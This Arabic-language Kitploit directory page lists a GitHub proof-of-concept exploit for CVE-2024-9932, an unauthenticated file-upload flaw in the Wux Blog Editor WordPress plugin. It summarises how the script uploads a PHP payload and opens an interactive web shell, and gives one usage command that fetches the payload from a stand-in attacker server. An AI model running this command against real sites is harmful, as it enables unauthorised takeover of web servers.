Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
0-click-RCE-Exploit-for-CVE-2024-9932 — استغلال ثغرة تنفيذ تعليمات برمجية عن بعد (RCE) بدون مصادقة وبدون نقرة (0-click) لـ CVE-2024-9932. يستغل ثغرة رفع ملفات عشوائية في إضافة Wux Blog Editor لووردبريس لرفع حمولة PHP عن بعد، واكتشاف نظام التشغيل الهدف، وتحقيق تنفيذ أوامر عن بعد من خلال ويب شِل تفاعلي. | Kitploit
أدوات/GitHubGitHub/joshuaprovoste/0-click-rce-exploit-for-cve-2024-9932
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقالفريق الأحمرتطوير الحمولات

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHub
joshuaprovoste/0-click-rce-exploit-for-cve-2024-9932

0-click-RCE-Exploit-for-CVE-2024-9932

استغلال ثغرة تنفيذ تعليمات برمجية عن بعد (RCE) بدون مصادقة وبدون نقرة (0-click) لـ CVE-2024-9932. يستغل ثغرة رفع ملفات عشوائية في إضافة Wux Blog Editor لووردبريس لرفع حمولة PHP عن بعد، واكتشاف نظام التشغيل الهدف، وتحقيق تنفيذ أوامر عن بعد من خلال ويب شِل تفاعلي.

عرض المستودع
2منذ 7 أشهرلم تتم المراجعة بعد

CVE-2024-9932 / استغلال RCE بنقرة صفرية

  • المؤلف: جوشوا بروفوست
  • https://x.com/JoshuaProvoste/status/1858329238153072668

CVE-2024-9932

يحتوي هذا المستودع على إثبات مفهوم لاستغلال ثغرة CVE-2024-9932، وهي ثغرة رفع ملف عشوائي غير مصادق عليها في إضافة Wux Blog Editor لووردبريس، مما يؤدي إلى تنفيذ أوامر عن بُعد (RCE).

ماذا يفعل السكربت

يستغل السكربت نقطة نهاية REST ضعيفة لرفع حمولة PHP عن بُعد دون مصادقة. بعد الرفع، يقوم بإعادة بناء موقع الملف النهائي، واكتشاف نظام التشغيل المستهدف، وتوفير شل تفاعلي عن بُعد لتنفيذ الأوامر.

الاستخدام

root@kitploit:~
python CVE-2024-9932.py --target http://target-wordpress-site --payload http://attacker-server/cmd.php --payload_name cmd.php

بعد التنفيذ، يقوم السكربت برفع الحمولة، وتأكيد إمكانية الوصول إليها، واكتشاف نظام التشغيل، ثم الدخول إلى شل تفاعلي.

ملاحظات

  • لا حاجة للمصادقة (قبل المصادقة / بنقرة صفرية).
تنزيل الأداة